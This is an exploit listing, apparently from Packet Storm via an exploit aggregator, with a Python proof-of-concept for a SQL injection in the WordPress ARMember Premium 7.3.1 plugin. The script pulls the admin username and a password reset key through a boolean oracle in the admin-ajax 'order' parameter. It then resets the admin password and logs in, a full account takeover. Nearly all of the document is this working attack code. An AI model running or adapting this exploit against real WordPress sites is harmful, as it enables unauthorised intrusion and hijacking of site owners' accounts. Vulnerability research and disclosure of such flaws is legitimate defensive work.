Share
## https://sploitus.com/exploit?id=PACKETSTORM:222845
==================================================================================================================================
| # Title : WordPress ARMember Premium 7.3.1 SQL Injection and Account Takeover |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://codecanyon.net/item/armember-complete-wordpress-membership-system/17785056 |
==================================================================================================================================
[+] Summary : This Python script implements a multi-stage exploitation workflow targeting a vulnerable WordPress environment using a SQL injection flaw associated with ARMember functionality.
[+] POC :
import requests
import string
def exploit_armember(target_url, directory_page, nonce, template_id):
"""exploit for CVE-2026-5076"""
admin_user = extract_sqli_string(
target_url, nonce, template_id,
"(SELECT user_login FROM wp_users WHERE ID=1)"
)
print(f"[+] Admin user: {admin_user}")
reset_key = extract_sqli_string(
target_url, nonce, template_id,
"(SELECT meta_value FROM wp_usermeta WHERE meta_key='arm_reset_password_key' LIMIT 1)"
)
print(f"[+] Plaintext reset key: {reset_key}")
reset_url = f"{target_url}/?armrp=true&key={reset_key}&login={admin_user}"
r = requests.get(reset_url)
if "Reset Password" in r.text:
requests.post(reset_url, data={
'pass1': 'Hacked123!',
'pass2': 'Hacked123!',
'key': reset_key,
'login': admin_user
})
print("[+] Password changed successfully!")
login_data = {
'log': admin_user,
'pwd': 'Hacked123!',
'wp-submit': 'Log In'
}
login_response = requests.post(f"{target_url}/wp-login.php", data=login_data)
if "dashboard" in login_response.text.lower():
print("[โ] ADMIN ACCESS CONFIRMED!")
def extract_sqli_string(target, nonce, tid, query):
"""Binary search via error-based boolean oracle"""
result = ""
charset = string.ascii_letters + string.digits
for pos in range(1, 50):
for char in charset:
payload = f"ASC,IF(SUBSTRING(({query}),{pos},1)='{char}',1,EXP(710))"
response = requests.post(
f"{target}/wp-admin/admin-ajax.php",
data={
'action': 'arm_directory_paging_action',
'arm_wp_nonce': nonce,
'template_id': tid,
'type': 'directory',
'order': payload
}
)
if len(response.text) > 1000: # Success response size
result += char
break
else:
break
return result
if __name__ == "__main__":
exploit_armember(
target_url="https://vulnerable-site.com",
directory_page="/members/",
nonce="a1b2c3d4e5f67890",
template_id="123"
)
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================